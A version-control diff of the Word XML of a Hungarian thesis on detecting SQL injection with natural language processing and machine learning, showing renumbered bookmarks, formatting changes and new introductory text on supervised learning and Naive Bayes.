-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2703,7 +2870,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961910" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020004" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2731,7 +2898,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961910 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020004 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2768,7 +2935,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2777,7 +2943,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961911" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020005" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2805,7 +2971,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961911 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020005 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2886,7 +3052,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc70961899"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc71019991"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3206,7 +3372,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc70961900"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc71019992"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3702,7 +3868,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc70961901"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc71019993"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3728,7 +3894,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc70961902"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc71019994"/>
       <w:r>
         <w:t>Sávon belüli</w:t>
       </w:r>
@@ -4564,7 +4730,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc70961903"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc71019995"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
@@ -5294,7 +5460,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc70961904"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc71019996"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -5670,7 +5836,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc70961905"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc71019997"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6147,13 +6313,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6199,6 +6359,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -6563,6 +6724,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -6790,7 +6952,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc70961906"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71019998"/>
       <w:r>
         <w:t>GÉPI TANULÁS</w:t>
       </w:r>
@@ -6801,6 +6963,355 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Mi a gépi tanulás?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A gépi tanulás az adatok mintázatának automatikus felfedezésének technikája.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>álózati biztonsági kontextusban a gépi tanulást használják arra, hogy meghatározzák a hálózati forgalom támadásként vagy normál forgalomként történő besorolásának legpontosabb és leghatékonyabb módját a digitális eszközök legjobb védelme érdekében</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Hogyan működik a gépi tanulás? (4)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A gépi tanulás (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vagy modell) felépítésének négy alapvető lépése van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gépi tanulási módszerek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(3)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Cmsor2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="426" w:hanging="426"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc71019999"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Felügyelt tanulás</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Mi a felügyelt tanulás?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Hogyan működik a felügyelt tanulás?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Felügyelt tanulási algoritmusok (7)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>elügyelt tanulás során c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ímkézett adatkészletek felhasználásával algoritmusokat képeznek, amelyek pontosan osztályozzák az adatokat vagy előre jelzik az eredményeket.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ez a típusú</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tanulás segít a szervezeteknek számos valós problémát megoldani, például a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fent említett hálózati forgalom osztályozás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a által.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc71020000"/>
+      <w:r>
+        <w:t>Naive Bayes</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -6821,11 +7332,11 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc70961907"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc71020001"/>
       <w:r>
         <w:t>PROGRAM FELÉPÍTÉSE</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -6852,11 +7363,11 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc70961908"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc71020002"/>
       <w:r>
         <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6911,7 +7422,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc70961909"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc71020003"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6921,7 +7432,7 @@
         </w:rPr>
         <w:t>Irodalomjegyzék</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6974,7 +7485,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc70961910"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc71020004"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6984,7 +7495,7 @@
         </w:rPr>
         <w:t>Nyilatkozat</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7159,7 +7670,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc70961911"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc71020005"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7169,7 +7680,7 @@
         </w:rPr>
         <w:t>Köszönetnyilvánítás</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8282,6 +8793,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="61BF323C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="EA52E50E"/>
+    <w:lvl w:ilvl="0" w:tplc="040E0001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1287" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2007" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2727" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3447" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4167" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4887" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="040E0001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5607" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="040E0003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6327" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="040E0005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="7047" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="66C264D6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CD9A3D8E"/>
@@ -8394,7 +9018,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="79BB3A78"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76AE7DE8"/>
@@ -8517,7 +9141,7 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="3"/>
@@ -8535,7 +9159,10 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,8 +154,174 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
-      </w:r>
+        <w:t xml:space="preserve">SQL injection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>detection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>using</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>natural</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>language</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>processing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>systems</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>learning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -660,7 +826,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71019988"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71124903"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -739,7 +905,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71019989"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71124904"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -873,15 +1039,33 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>egy kód SQL injection</w:t>
-      </w:r>
+        <w:t xml:space="preserve">egy kód SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">beli </w:t>
+        <w:t>injection</w:t>
